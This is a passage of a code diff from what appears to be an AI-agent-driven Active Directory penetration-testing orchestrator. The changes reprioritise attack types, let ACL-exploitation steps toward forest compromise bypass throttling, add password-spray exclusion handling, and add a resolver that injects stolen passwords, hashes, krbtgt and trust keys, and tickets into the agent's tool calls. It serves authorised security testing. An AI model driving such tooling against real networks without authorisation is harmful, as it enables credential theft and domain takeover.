SMB signing, and PrintNightmare should be most penalized (8) assert_eq!(s.effective_priority("password_spray"), 8); assert_eq!(s.effective_priority("smb_signing_disabled"), 8); + assert_eq!(s.effective_priority("printnightmare"), 8); + // NTLM relay is noisy too (7) + assert_eq!(s.effective_priority("ntlm_relay"), 7); // ADCS/ACL should be most prioritized (1) assert_eq!(s.effective_priority("esc1"), 1); assert_eq!(s.effective_priority("acl_abuse"), 1); diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs index 45aba1a1..850cce51 100644 --- a/ares-cli/src/orchestrator/task_queue.rs +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -81,6 +81,10 @@ pub struct HeartbeatData { pub pod_name: Option, } +// --------------------------------------------------------------------------- +// TaskQueueCore — thin async wrapper around a redis connection. +// --------------------------------------------------------------------------- + /// Async Redis task queue implementing the Ares queue protocol. /// /// Generic over connection type to support both production (`ConnectionManager`) @@ -124,6 +128,11 @@ impl TaskQueue { /// Create a dedicated (non-shared) multiplexed connection for blocking /// commands like BRPOP. Each call opens a fresh TCP connection so /// concurrent BRPOP calls from different agent loops do not serialize. + /// + /// Disables the redis-rs default 500ms response_timeout — BRPOP for tool + /// results blocks for up to `tool_timeout` (1500s default), so the + /// per-command socket timeout would fire long before the result arrives, + /// surfacing as `Io: timed out` errors. pub async fn dedicated_connection(&self) -> Result { let url = self .redis_url @@ -131,8 +140,10 @@ impl TaskQueue { .ok_or_else(|| anyhow::anyhow!("No redis_url stored (test backend?)"))?; let client = redis::Client::open(url).with_context(|| format!("Invalid Redis URL: {url}"))?; + let config = redis::AsyncConnectionConfig::new() + .set_response_timeout(Some(Duration::from_secs(1800))); let conn = client - .get_multiplexed_async_connection() + .get_multiplexed_async_connection_with_config(&config) .await .with_context(|| "Failed to open dedicated Redis connection for BRPOP")?; Ok(conn) diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs index ff4ecee8..06c3d09e 100644 --- a/ares-cli/src/orchestrator/throttling.rs +++ b/ares-cli/src/orchestrator/throttling.rs @@ -34,7 +34,13 @@ const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ ]; /// Maximum tasks allowed to bypass the hard cap simultaneously. -const MAX_BYPASS_TASKS: usize = 3; +/// +/// Sized to accommodate restart-requeue scenarios where many in-flight critical +/// tasks rehydrate at once and the active-task tracker hasn't yet evicted stale +/// entries from the previous orchestrator instance. With MAX_BYPASS_TASKS=3 the +/// bypass channel saturates trivially and even ACL chain steps deadlock waiting +/// for stale exploit tasks to be evicted. +const MAX_BYPASS_TASKS: usize = 10; /// What the throttler decided about a candidate task. #[derive(Debug, Clone, PartialEq, Eq)] @@ -101,6 +107,18 @@ impl Throttler { let hard_cap = self.config.hard_cap(); if llm_count >= hard_cap { + // Always-bypass tasks (acl_chain_step) skip even the bypass-cap. + // Stale exploit-task buildup must not block the ACL exploitation + // pipeline since those steps are the actual path to forest + // compromise. + if self.is_always_bypass(task_type) { + info!( + llm_count, + hard_cap, task_type, "Hard cap: always-bypass critical task — allowing" + ); + return ThrottleDecision::Allow; + } + if self.is_critical_path(task_type, payload) { let bypass_count = llm_count.saturating_sub(hard_cap); if bypass_count >= MAX_BYPASS_TASKS { @@ -129,7 +147,7 @@ impl Throttler { if llm_count >= max_tasks { let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default + let min_per_role = self.config.max_tasks_per_role; if role_count < min_per_role { info!( llm_count, @@ -201,7 +219,22 @@ impl Throttler { sem.try_acquire_owned().ok() } + /// Task types that bypass even the bypass-cap (always allowed past hard cap). + /// These are paths whose dispatch must never be blocked by stale or + /// hung in-flight tasks — `acl_chain_step` runs from `auto_dacl_abuse` + /// with a pre-resolved credential and is the practical path to forest + /// compromise via ACL exploitation. + fn is_always_bypass(&self, task_type: &str) -> bool { + matches!(task_type, "acl_chain_step") + } + fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { + // Always-bypass tasks are also critical path (covered separately + // earlier in `check`, but keep the function consistent). + if self.is_always_bypass(task_type) { + return true; + } + // Check exploit + vuln_type if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { if let Some(p) = payload { @@ -317,6 +350,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -336,6 +370,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -356,6 +391,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -377,6 +413,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: Instant::now(), + credential_key: None, }) .await; } @@ -387,6 +424,52 @@ mod tests { ); } + #[tokio::test] + async fn critical_path_acl_chain_step_bypasses_hard_cap() { + let (t, tracker) = make_throttler(2); + // Saturate well beyond hard_cap (3) and beyond MAX_BYPASS_TASKS (10) + // to verify acl_chain_step bypasses even the bypass-cap. + for i in 0..50 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: Instant::now(), + credential_key: None, + }) + .await; + } + let payload = json!({"acl_type": "writeproperty", "target_user": "krbtgt"}); + assert_eq!( + t.check("acl_chain_step", "acl", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_exploit_still_bypass_capped() { + let (t, tracker) = make_throttler(2); + // Saturate beyond MAX_BYPASS_TASKS — ordinary critical-path exploits + // must still be deferred (only acl_chain_step is always-bypass). + for i in 0..50 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: Instant::now(), + credential_key: None, + }) + .await; + } + let payload = json!({"vuln_type": "constrained_delegation"}); + assert_eq!( + t.check("exploit", "privesc", Some(&payload)).await, + ThrottleDecision::Defer + ); + } + #[tokio::test] async fn rate_limit_triggers_backoff() { let (t, _) = make_throttler(8); diff --git a/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs b/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs new file mode 100644 index 00000000..77ce7201 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/domain_validator.rs @@ -0,0 +1,188 @@ +//! Validate `domain` arguments on outgoing LLM tool calls. +//! +//! The LLM occasionally fat-fingers domain names in tool arguments +//! (e.g. `child.contossso.local` instead of `child.contoso.local`). +//! Tools accept the typo silently, then auth fails, credential lineage breaks, +//! and downstream consumers (cross-forest forge, ADCS enum, credential_resolver) +//! get misdirected. The publishing-side guard already keeps these typos out of +//! `state.domains`, but the typo'd value still rides on credential records and +//! pollutes per-credential routing. +//! +//! This module rejects tool calls whose `domain` argument doesn't match any +//! domain that authoritative recon has discovered. The LLM gets a synchronous +//! error listing valid domains and retries with the right spelling. + +use tracing::warn; + +use ares_core::state::RedisStateReader; +use ares_llm::{ToolCall, ToolExecResult}; + +use crate::orchestrator::task_queue::TaskQueue; + +/// Inspect a tool call's `domain` argument; return a synthetic error result +/// if it looks like a hallucinated FQDN. Returns `None` to allow the call. +/// +/// Allow rules: +/// - No `domain` arg, or empty → allow. +/// - Domain has no dot (workgroup-style label like `WORKGROUP`) → allow. +/// - Domain matches `state.domains` ∪ DC-map keys ∪ trusted-domain keys +/// (case-insensitive) → allow. +/// - Known-domain set is empty (early in the op, no recon yet) → allow. +/// +/// Otherwise: reject with an error listing the known domains. +pub(super) async fn check_domain_arg( + queue: &TaskQueue, + operation_id: &str, + call: &ToolCall, +) -> Option { + let supplied = call.arguments.get("domain").and_then(|v| v.as_str())?; + let supplied = supplied.trim(); + if supplied.is_empty() || !supplied.contains('.') { + return None; + } + let supplied_lc = supplied.to_lowercase(); + + let mut conn = queue.connection(); + let reader = RedisStateReader::new(operation_id.to_string()); + + let domains = reader.get_domains(&mut conn).await.unwrap_or_default(); + let dc_keys: Vec = reader + .get_dc_map(&mut conn) + .await + .unwrap_or_default() + .into_keys() + .collect(); + let trusted: Vec = reader + .get_trusted_domains(&mut conn) + .await + .unwrap_or_default() + .into_keys() + .collect(); + + let mut known: Vec = domains + .into_iter() + .chain(dc_keys.into_iter()) + .chain(trusted.into_iter()) + .map(|d| d.to_lowercase()) + .collect(); + known.sort(); + known.dedup(); + + if known.is_empty() { + return None; + } + if known.iter().any(|d| d == &supplied_lc) { + return None; + } + + // Also consult cred/hash records: their `domain` field may legitimately + // carry NetBIOS-style or freshly-discovered values that haven't yet been + // promoted into the canonical domains set. Only reject if the supplied + // value is foreign to every channel. + if let Ok(creds) = reader.get_credentials(&mut conn).await { + if creds + .iter() + .any(|c| c.domain.eq_ignore_ascii_case(supplied)) + { + return None; + } + } + + warn!( + tool = %call.name, + supplied = %supplied, + known = ?known, + "Rejecting tool call: domain argument not in known domains" + ); + + let suggestion = closest_match(&supplied_lc, &known); + let message = match suggestion { + Some(s) => format!( + "Unknown domain '{}'. Known domains: [{}]. Did you mean '{}'?", + supplied, + known.join(", "), + s + ), + None => format!( + "Unknown domain '{}'. Known domains: [{}]. Use one of these exactly, or call a recon tool first to discover the correct FQDN.", + supplied, + known.join(", ") + ), + }; + + Some(ToolExecResult { + output: String::new(), + error: Some(message), + discoveries: None, + }) +} + +/// Return the known domain with the smallest edit distance to `supplied`, +/// if any are within distance 3. Used only to nudge the LLM in the error. +fn closest_match(supplied: &str, known: &[String]) -> Option { + known + .iter() + .map(|d| (d.clone(), edit_distance(supplied, d))) + .filter(|(_, dist)| *dist <= 3) + .min_by_key(|(_, dist)| *dist) + .map(|(d, _)| d) +} + +fn edit_distance(a: &str, b: &str) -> usize { + let a: Vec = a.chars().collect(); + let b: Vec = b.chars().collect(); + let (n, m) = (a.len(), b.len()); + if n == 0 { + return m; + } + if m == 0 { + return n; + } + let mut prev: Vec = (0..=m).collect(); + let mut curr = vec![0usize; m + 1]; + for i in 1..=n { + curr[0] = i; + for j in 1..=m { + let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 }; + curr[j] = (prev[j] + 1).min(curr[j - 1] + 1).min(prev[j - 1] + cost); + } + std::mem::swap(&mut prev, &mut curr); + } + prev[m] +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn edit_distance_basic() { + assert_eq!(edit_distance("contoso.local", "contoso.local"), 0); + assert_eq!( + edit_distance("child.contossso.local", "child.contoso.local"), + 2 + ); + assert_eq!( + edit_distance("child.contosssso.local", "child.contoso.local"), + 3 + ); + assert!(edit_distance("foo.bar", "completely.different") > 5); + } + + #[test] + fn closest_match_picks_nearest() { + let known = vec![ + "fabrikam.local".to_string(), + "child.contoso.local".to_string(), + "contoso.local".to_string(), + ]; + let picked = closest_match("child.contossso.local", &known); + assert_eq!(picked.as_deref(), Some("child.contoso.local")); + } + + #[test] + fn closest_match_returns_none_when_far() { + let known = vec!["fabrikam.local".to_string()]; + assert!(closest_match("totally.unrelated.domain", &known).is_none()); + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/local.rs b/ares-cli/src/orchestrator/tool_dispatcher/local.rs index ef5e9505..1c8286b7 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/local.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/local.rs @@ -1,13 +1,16 @@ //! In-process tool dispatcher (no Redis). use anyhow::Result; -use tracing::debug; +use tracing::{debug, warn}; use ares_llm::{ToolCall, ToolExecResult}; +use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueue; +use crate::worker::credential_resolver::resolve_credentials; -use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; +use super::domain_validator::check_domain_arg; +use super::{extract_credential_key, inject_excluded_users, push_realtime_discoveries, AuthThrottle}; /// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. /// @@ -17,6 +20,7 @@ pub struct LocalToolDispatcher { pub(super) queue: TaskQueue, pub(super) operation_id: String, pub(super) auth_throttle: AuthThrottle, + pub(super) state: Option, } impl LocalToolDispatcher { @@ -25,8 +29,16 @@ impl LocalToolDispatcher { queue, operation_id, auth_throttle, + state: None, } } + + /// Attach orchestrator state so spray-style tool calls can be augmented + /// with the current quarantine list before dispatch. + pub fn with_state(mut self, state: SharedState) -> Self { + self.state = Some(state); + self + } } #[async_trait::async_trait] @@ -37,6 +49,11 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { _task_id: &str, call: &ToolCall, ) -> Result { + // Reject calls whose `domain` argument doesn't match a known domain. + if let Some(rejection) = check_domain_arg(&self.queue, &self.operation_id, call).await { + return Ok(rejection); + } + // Rate-limit auth-bearing tools to prevent AD account lockout if let Some(cred_key) = extract_credential_key(call) { self.auth_throttle.acquire(&cred_key).await; @@ -44,7 +61,34 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { debug!(tool = %call.name, "Executing tool locally"); - match ares_tools::dispatch(&call.name, &call.arguments).await { + // Resolve credentials from operation state. The LLM never passes + // secret material — usernames + domains only. Mirrors the worker + // tool_executor path so local (in-process) dispatch gets the same + // injection. + let mut resolved_arguments = call.arguments.clone(); + // Spray hygiene: augment excluded_users from the current quarantine + // list before dispatch. Done before credential resolution so the + // domain arg (used for the lookup) is the LLM-supplied target. + inject_excluded_users(&self.state, &call.name, &mut resolved_arguments).await; + let mut conn = self.queue.connection(); + if let Err(e) = resolve_credentials( + &mut conn, + Some(self.operation_id.as_str()), + &call.name, + &mut resolved_arguments, + ) + .await + { + warn!( + tool = %call.name, + err = %e, + "credential_resolver failed; continuing with original arguments" + ); + resolved_arguments = call.arguments.clone(); + inject_excluded_users(&self.state, &call.name, &mut resolved_arguments).await; + } + + match ares_tools::dispatch(&call.name, &resolved_arguments).await { Ok(output) => { let raw = output.combined_raw(); let combined = output.combined(); @@ -56,7 +100,7 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { // Parse structured discoveries from raw (unfiltered) output let discoveries = - ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); + ares_tools::parsers::parse_tool_output(&call.name, &raw, &resolved_arguments); let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { None } else { @@ -70,7 +114,7 @@ impl ares_llm::ToolDispatcher for LocalToolDispatcher { &self.operation_id, disc, &call.name, - &call.arguments, + &resolved_arguments, ) .await; } diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs index 0e8d4155..0c777784 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -14,10 +14,11 @@ use redis::AsyncCommands; use serde::{Deserialize, Serialize}; use tracing::debug; -use crate::orchestrator::state::DISCOVERY_KEY_PREFIX; +use crate::orchestrator::state::{SharedState, DISCOVERY_KEY_PREFIX}; use crate::orchestrator::task_queue::TaskQueue; mod auth_throttle; +mod domain_validator; mod local; mod redis_dispatcher; #[cfg(test)] @@ -80,6 +81,7 @@ const RECON_ROUTED_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", ]; @@ -98,6 +100,7 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_spider", "check_credman_entries", "check_autologon_registry", + "smb_login_check", "domain_admin_checker", "gmsa_dump_passwords", // impacket tools @@ -116,6 +119,65 @@ const AUTH_BEARING_TOOLS: &[&str] = &[ "smbclient_kerberos_shares", ]; +/// Spray-style tools that accept `excluded_users` to skip already-locked +/// accounts. The dispatcher auto-injects the current quarantine list so the +/// LLM cannot omit it (or pass a stale value) and re-lock those accounts. +const SPRAY_TOOLS: &[&str] = &["password_spray", "username_as_password"]; + +/// Merge the current per-domain quarantine list into `excluded_users` on +/// spray-style tool calls. Mutates `arguments` in place; no-op for tools +/// outside `SPRAY_TOOLS`, when `state` is unset, or when no domain arg is +/// present. Preserves any LLM-supplied `excluded_users` by union-merging. +pub(super) async fn inject_excluded_users( + state: &Option, + tool_name: &str, + arguments: &mut serde_json::Value, +) { + if !SPRAY_TOOLS.contains(&tool_name) { + return; + } + let Some(state) = state else { return }; + let Some(domain) = arguments + .get("domain") + .and_then(|v| v.as_str()) + .map(str::to_string) + else { + return; + }; + let quarantined = state.read().await.quarantined_users_in_domain(&domain); + if quarantined.is_empty() { + return; + } + + let existing = arguments + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let mut set: std::collections::BTreeSet = quarantined + .iter() + .map(|u| u.to_lowercase()) + .collect(); + for u in existing.split(',') { + let trimmed = u.trim(); + if !trimmed.is_empty() { + set.insert(trimmed.to_lowercase()); + } + } + let merged: Vec = set.into_iter().collect(); + if let Some(obj) = arguments.as_object_mut() { + obj.insert( + "excluded_users".to_string(), + serde_json::Value::String(merged.join(",")), + ); + debug!( + tool = %tool_name, + domain = %domain, + count = merged.len(), + "Auto-injected excluded_users from quarantine" + ); + } +} + /// Extract a credential key from tool call arguments for rate limiting. /// Returns `Some("user@domain")` if the tool authenticates with credentials. pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option { diff --git a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs index ed20330c..bd4fcbe4 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs @@ -8,11 +8,13 @@ use ares_core::telemetry::propagation::inject_traceparent; use ares_core::telemetry::spans::{producer_span, Team}; use ares_llm::{ToolCall, ToolExecResult}; +use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueue; +use super::domain_validator::check_domain_arg; use super::{ - extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest, - ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX, + extract_credential_key, inject_excluded_users, push_realtime_discoveries, AuthThrottle, + ToolExecRequest, ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX, }; /// Dispatches tool calls to workers via Redis queues. @@ -26,6 +28,7 @@ pub struct RedisToolDispatcher { pub(super) tool_timeout: std::time::Duration, pub(super) operation_id: String, pub(super) auth_throttle: AuthThrottle, + pub(super) state: Option, } impl RedisToolDispatcher { @@ -35,8 +38,16 @@ impl RedisToolDispatcher { tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS), operation_id, auth_throttle, + state: None, } } + + /// Attach orchestrator state so spray-style tool calls can be augmented + /// with the current quarantine list before dispatch. + pub fn with_state(mut self, state: SharedState) -> Self { + self.state = Some(state); + self + } } #[async_trait::async_trait] @@ -56,11 +67,26 @@ impl ares_llm::ToolDispatcher for RedisToolDispatcher { ); async { + // Reject calls whose `domain` argument doesn't match a known + // domain — catches LLM typos before they pollute credential + // records or misroute downstream tooling. + if let Some(rejection) = + check_domain_arg(&self.queue, &self.operation_id, call).await + { + return Ok(rejection); + } + // Rate-limit auth-bearing tools to prevent AD account lockout if let Some(cred_key) = extract_credential_key(call) { self.auth_throttle.acquire(&cred_key).await; } + // Server-side spray hygiene: union the current per-domain + // quarantine list into excluded_users. The LLM cannot be relied + // on to pass this consistently across many spray invocations. + let mut arguments = call.arguments.clone(); + inject_excluded_users(&self.state, &call.name, &mut arguments).await; + let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple()); // Inject trace context for cross-service span linking @@ -70,7 +96,7 @@ impl ares_llm::ToolDispatcher for RedisToolDispatcher { call_id: call_id.clone(), task_id: task_id.to_string(), tool_name: call.name.clone(), - arguments: call.arguments.clone(), + arguments, traceparent, operation_id: Some(self.operation_id.clone()), }; diff --git a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs index eeabb95a..aa47c5bb 100644 --- a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs +++ b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs @@ -96,3 +96,76 @@ fn cross_role_routing_recon_stays_recon() { "recon" ); } + +#[tokio::test] +async fn inject_excluded_users_no_state_is_noop() { + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&None, "password_spray", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} + +#[tokio::test] +async fn inject_excluded_users_skips_non_spray_tools() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&Some(state), "smb_login_check", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} + +#[tokio::test] +async fn inject_excluded_users_populates_from_state() { + let state = SharedState::new("op-1".into()); + { + let mut s = state.write().await; + s.quarantine_user("testuser1", "contoso.local"); + s.quarantine_user("testuser2", "contoso.local"); + s.quarantine_user("testuser3", "fabrikam.local"); + } + let mut args = serde_json::json!({"target": "1.2.3.4", "domain": "contoso.local"}); + inject_excluded_users(&Some(state), "password_spray", &mut args).await; + let excluded = args + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap(); + let mut parts: Vec<&str> = excluded.split(',').collect(); + parts.sort(); + assert_eq!(parts, vec!["testuser1", "testuser2"]); +} + +#[tokio::test] +async fn inject_excluded_users_unions_with_existing() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({ + "target": "1.2.3.4", + "domain": "contoso.local", + "excluded_users": "Administrator,testuser2", + }); + inject_excluded_users(&Some(state), "username_as_password", &mut args).await; + let excluded = args + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap(); + let mut parts: Vec<&str> = excluded.split(',').collect(); + parts.sort(); + assert_eq!(parts, vec!["administrator", "testuser1", "testuser2"]); +} + +#[tokio::test] +async fn inject_excluded_users_no_domain_is_noop() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({"target": "1.2.3.4"}); + inject_excluded_users(&Some(state), "password_spray", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} diff --git a/ares-cli/src/worker/credential_resolver.rs b/ares-cli/src/worker/credential_resolver.rs new file mode 100644 index 00000000..86a7d3c5 --- /dev/null +++ b/ares-cli/src/worker/credential_resolver.rs @@ -0,0 +1,1581 @@ +//! State-based credential resolver for tool dispatch. +//! +//! The LLM names principals (`username`, `domain`) and targets — never secret +//! material. This module resolves the actual `password`, `hash`, `aes_key`, +//! `ticket_path`, `trust_key`, and SID values from operation state immediately +//! before `ares_tools::dispatch`. +//! +//! If the LLM (or anything upstream) supplies a credential-shaped argument, this +//! resolver replaces it with the state-resolved value. The LLM never wins. +//! +//! When state has no value for a credential the tool needs, the resolver leaves +//! the field absent and the tool's executor surfaces a normal "missing +//! parameter" error to the LLM. That signal tells the orchestrator to harvest +//! credentials before retrying. +//! +//! Lookup keys per field: +//! +//! | Field | Source | +//! | --------------------- | ---------------------------------------------- | +//! | `password` | `Credential.password` by `(username, domain)` | +//! | `hash` | `Hash.hash_value` by `(username, domain)` | +//! | `nt_hash` | NT half of `Hash.hash_value` | +//! | `aes_key` | `Hash.aes_key` by `(username, domain)` | +//! | `ticket_path` | most-recent `*.ccache` matching principal | +//! | `krbtgt_hash` | `Hash` for `(krbtgt, domain)` | +//! | `child_krbtgt_hash` | `Hash` for `(krbtgt, child_domain)` | +//! | `trust_key` | `Hash` for `(target_netbios + '$', source)` | +//! | `trust_aes_key` | `Hash.aes_key` for trust account | +//! | `domain_sid` | `domain_sids` HASH by `domain` | +//! | `source_sid` | `domain_sids` HASH by `source_domain` | +//! | `target_sid` | `domain_sids` HASH by `target_domain`/trusted | + +use std::path::PathBuf; + +use anyhow::Result; +use redis::aio::ConnectionManager; +use serde_json::{Map, Value}; +use tracing::{debug, info, warn}; + +use ares_core::models::{Credential, Hash}; +use ares_core::state::RedisStateReader; + +/// Argument keys that contain secret material and must come from state, never +/// from the LLM. +pub const CREDENTIAL_KEYS: &[&str] = &[ + "password", + "hash", + "nt_hash", + "ntlm_hash", + "aes_key", + "aes256_key", + "ticket_path", + "krbtgt_hash", + "child_krbtgt_hash", + "parent_krbtgt_hash", + "trust_key", + "trust_aes_key", + "trust_hash", + "admin_hash", + "coerce_password", + "coerce_hash", + "domain_sid", + "source_sid", + "target_sid", + "extra_sid", + "kerberos_keys", +]; + +/// Resolve credential arguments for a tool call from operation state. +/// +/// Mutates `arguments` in place. Reads `username`, `domain`, `source_domain`, +/// `target_domain`, `trusted_domain`, `child_domain` to identify the principal. +/// Looks up credentials from the operation's Redis state and sets credential +/// keys on the arguments object. +/// +/// If `operation_id` is `None`, this is a no-op: the tool runs with whatever +/// arguments were provided. This handles direct CLI invokes and tests. +pub async fn resolve_credentials( + conn: &mut ConnectionManager, + operation_id: Option<&str>, + tool_name: &str, + arguments: &mut Value, +) -> Result<()> { + let Some(op_id) = operation_id else { + debug!( + tool = %tool_name, + "credential_resolver: no operation_id, skipping resolution" + ); + return Ok(()); + }; + + let Some(args_obj) = arguments.as_object_mut() else { + return Ok(()); + }; + + // Strip any LLM-supplied credential placeholders before lookup. Even if + // state has nothing, we never want a `[HASH]` or `` literal to + // reach the dispatch layer. + strip_placeholder_credentials(args_obj); + + let reader = RedisStateReader::new(op_id.to_string()); + + // Bulk-load state once per call. These are HASHes/LISTs cached in Redis, + // so the cost is small relative to the subsequent tool execution. + let credentials = reader.get_credentials(conn).await.unwrap_or_default(); + let hashes = reader.get_hashes(conn).await.unwrap_or_default(); + let domain_sids = reader.get_domain_sids(conn).await.unwrap_or_default(); + + let primary_username = string_field(args_obj, "username"); + // `bind_domain` is the auth realm for cross-forest queries (e.g. + // ldap_search against fabrikam.local using a contoso.local principal). + // `domain` is the *target* of the query in those tools, not the + // credential's domain — looking up `(user, domain=target)` misses the + // stored principal. Prefer `bind_domain` when present so cross-forest + // LDAP/RPC enumerations can resolve their auth cred. + let mut primary_domain = string_field(args_obj, "bind_domain") + .or_else(|| string_field(args_obj, "domain")) + .or_else(|| string_field(args_obj, "source_domain")) + .or_else(|| string_field(args_obj, "child_domain")); + + // Fallback: when LLM passes `domain=""`, infer the domain from the + // target host. Without this, every downstream resolution (password, + // hash, ticket) fails because primary_domain is None and the + // `(Some, Some)` guard below never fires. Tools then bail with + // "credentials must be present in operation state for the (user, domain) + // pair" even though the credential exists under the host's domain. + // + // Resolution order — first match wins: + // 1. If `target`/`target_ip`/`dc_ip` is an IP that matches a DC, use + // that DC's domain. + // 2. If `target_hostname`/`hostname`/`target` carries an FQDN suffix + // (e.g. `dc01.contoso.local`), use the suffix. + if primary_domain.is_none() { + primary_domain = infer_domain_from_target(args_obj, conn, &reader).await; + if let Some(ref d) = primary_domain { + // Inject the resolved domain back into args so downstream tools + // (which read `domain` directly) get a non-empty realm too. + if !args_obj + .get("domain") + .and_then(|v| v.as_str()) + .map(|s| !s.trim().is_empty()) + .unwrap_or(false) + { + args_obj.insert("domain".to_string(), Value::String(d.clone())); + } + debug!( + tool = %tool_name, + domain = %d, + "credential_resolver: inferred missing domain from target host" + ); + } + } + + info!( + tool = %tool_name, + user = primary_username.as_deref().unwrap_or("(none)"), + domain = primary_domain.as_deref().unwrap_or("(none)"), + cred_count = credentials.len(), + hash_count = hashes.len(), + "credential_resolver: resolving" + ); + + // Standard principal credentials (password, hash, aes_key) + if let (Some(user), Some(domain)) = (primary_username.as_deref(), primary_domain.as_deref()) { + let pw_before = args_obj.contains_key("password"); + let hash_before = args_obj.contains_key("hash"); + let realm_strict = requires_exact_realm(tool_name); + resolve_principal_credentials(args_obj, &credentials, &hashes, user, domain, realm_strict); + let pw_injected = !pw_before && args_obj.contains_key("password"); + let hash_injected = !hash_before && args_obj.contains_key("hash"); + if pw_injected || hash_injected { + info!( + tool = %tool_name, + user = %user, + domain = %domain, + injected_password = pw_injected, + injected_hash = hash_injected, + "credential_resolver: injected from state" + ); + } else if !pw_before && !hash_before { + warn!( + tool = %tool_name, + user = %user, + domain = %domain, + cred_count = credentials.len(), + hash_count = hashes.len(), + "credential_resolver: no credential matched principal in state" + ); + } + } + + // Auxiliary principal: `coerce_user` / `coerce_domain` for relay_and_coerce. + // The LLM names the coercion principal; the resolver injects + // `coerce_password` or `coerce_hash` from state. + resolve_coerce_principal(args_obj, &credentials, &hashes); + + // Kerberos ticket path — pick most recent matching ccache when the schema + // expects one but the args don't have it. + if expects_ticket(tool_name, args_obj) { + if let (Some(user), Some(domain)) = (primary_username.as_deref(), primary_domain.as_deref()) + { + if let Some(path) = find_ccache(user, domain) { + args_obj.insert("ticket_path".to_string(), Value::String(path)); + } + } + } + + // krbtgt hash — for golden ticket forging. + resolve_krbtgt_hashes(args_obj, &hashes); + + // Cross-forest Kerberos ticket — inject ticket_path for LDAP-bind tools + // when the target server is in a foreign forest. `primary_domain` prefers + // `bind_domain` (the auth realm) for cred resolution, but the inter-realm + // ticket must be looked up by the *target* realm (the server's realm). + // For ldap_acl_enumeration / ldap_search against a foreign DC, the LLM + // passes `domain=` and `bind_domain=` — without + // this distinction we look up the ticket under the auth realm and miss + // the forged ccache, leaving the tool to attempt cross-realm NTLM bind + // (which the foreign DC rejects with 0x52e). + if requires_exact_realm(tool_name) && !args_obj.contains_key("ticket_path") { + let target_realm = string_field(args_obj, "target_domain") + .or_else(|| string_field(args_obj, "domain")) + .or_else(|| primary_domain.clone()); + if let Some(ref realm) = target_realm { + resolve_cross_forest_ticket(args_obj, &reader, conn, tool_name, realm, 